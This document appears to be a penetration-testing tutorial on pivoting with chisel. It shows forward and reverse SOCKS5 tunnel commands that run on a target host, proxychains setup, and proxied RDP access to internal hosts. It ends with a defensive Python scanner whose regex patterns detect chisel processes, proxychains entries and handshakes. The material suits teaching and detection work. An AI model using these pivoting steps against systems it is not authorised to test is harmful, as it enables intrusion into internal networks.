Chisel
To perform SOCKS5 tunnelling, we can use a tool called chisel. Chisel is written in Go and transports data over HTTP, secured with SSH. It can create a client-server tunnel connection in a firewall-restricted environment.
We can install chisel on Kali with apt install chisel, or download it from GitHub and transfer it to remote hosts.
https://github.com/jpillora/chisel.git
If we build it from the GitHub repository, we will need Go installed and run the following commands inside the cloned directory.
cd chisel
go build
Once built, we can transfer the binary to our target hosts using different file transfer methods such as SCP.
scp chisel <username>@<Target IP>:~/
Once transferred, we can run the following command on the target.
./chisel server -v -p <port> --socks5
Command breakdown:
server - Specify to run in server mode.
-v - Enable verbose mode.
-p <port> - Specify the port to listen on for connections.
--socks5 - Specify to use SOCKS5.
Once the server has started, we can connect to it on our attacking machine.
chisel client -v <Target IP>:<port> socks
Command breakdown:
client - Specify to run in client mode.
-v - Enable verbose mode.
<Target IP>:<port> - Specify the chisel server IP address and the port it is listening on.
socks - Specify to use SOCKS.
Once connected, we can edit the /etc/proxychains.conf and add the following information.
socks5 127.0.0.1 <port>
We can pivot by putting proxychains in front of the command that we want to run. An example would be using xfreerdp.
proxychains xfreerdp /v:<Internal host IP> /u:<username> /p:<password>
Reverse Pivot
We can also use the --reverse flag to enable the target to connect to the attacker if there is no direct path.
chisel server --reverse -v -p <port> --socks5
We can connect to the server using the following command on the target.
./chisel client -v <Attacker IP>:<port> R:socks
In the above command, the R stands for reverse. Reverse remotes will listen on the server's default SOCKS port (1080) and terminate the connection at the client's internal SOCKS5 proxy.
Once done, we will need to add the following line to the /etc/proxychains.conf file.
socks5 127.0.0.1 1080
Once added, we can pivot by adding the proxychains command before running our desired command or tool.
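From the defensive side, the invocations above leave recognisable traces: chisel server/client command lines, a proxychains.conf entry pointing at a local SOCKS5 listener, and the WebSocket handshake chisel performs over HTTP. The following scanner is an added example written for these notes, not part of chisel or proxychains; the process lines, config lines and headers are constructed, and the chisel-v3 subprotocol value is an assumption to verify against the chisel version in use.

```python
import re

# Command-line shapes taken from the chisel invocations on this page.
SERVER_RE = re.compile(r"\bchisel\s+server\b(?P<args>.*)")
CLIENT_RE = re.compile(
    r"\bchisel\s+client\b(?:\s+-\S+)*\s+(?P<target>\S+)\s+(?P<remote>R:socks|socks)\b")
PORT_RE = re.compile(r"-p\s+(\d+)")
# proxychains entry pointing at a local SOCKS5 listener, as added on this page.
PROXYCHAINS_RE = re.compile(r"^\s*socks5\s+127\.0\.0\.1\s+(?P<port>\d+)\s*$")
# WebSocket subprotocol chisel negotiates; assumed value, verify against the version in use.
WS_PROTO_RE = re.compile(r"Sec-WebSocket-Protocol:\s*chisel-v\d+", re.IGNORECASE)

def scan_process_list(lines):
    """Return (source, kind, detail) findings for chisel server/client processes."""
    findings = []
    for line in lines:
        if m := SERVER_RE.search(line):
            args = m.group("args")
            mode = "reverse" if "--reverse" in args else "forward"
            proxy = "socks5" if "--socks5" in args else "plain"
            port = PORT_RE.search(args)
            findings.append(("process", "chisel-server",
                             f"{mode} {proxy} port={port.group(1) if port else '?'}"))
        elif m := CLIENT_RE.search(line):
            kind = "reverse-socks" if m.group("remote").startswith("R:") else "forward-socks"
            findings.append(("process", f"chisel-client-{kind}", m.group("target")))
    return findings

def scan_proxychains(lines):
    """Flag proxychains.conf entries that route traffic into a local SOCKS5 listener."""
    return [("proxychains.conf", "local-socks5-proxy", m.group("port"))
            for line in lines if (m := PROXYCHAINS_RE.match(line))]

def scan_http_headers(lines):
    """Flag a chisel WebSocket handshake in captured HTTP request headers."""
    return [("http", "chisel-websocket-handshake", line.strip())
            for line in lines if WS_PROTO_RE.search(line)]

# Constructed sample inputs (not real captures); IPs are documentation-range addresses.
PROCS = [
    "root   4242 ./chisel server -v -p 8000 --socks5",
    "www    5151 /usr/sbin/sshd -D",
    "www    6161 chisel client -v 192.0.2.10:8000 socks",
    "www    7171 ./chisel client -v 198.51.100.7:443 R:socks",
    "ops    8181 ./chisel server --reverse -v -p 443 --socks5",
]
PROXYCHAINS = ["[ProxyList]", "socks4 127.0.0.1 9050", "socks5 127.0.0.1 1080"]
HEADERS = ["GET / HTTP/1.1", "Upgrade: websocket", "Sec-WebSocket-Protocol: chisel-v3"]
```

Feed it real ps output, the proxychains config and proxied HTTP request headers to get one finding per matched line, e.g. scan_process_list(PROCS) reports the forward server on port 8000 and both client modes.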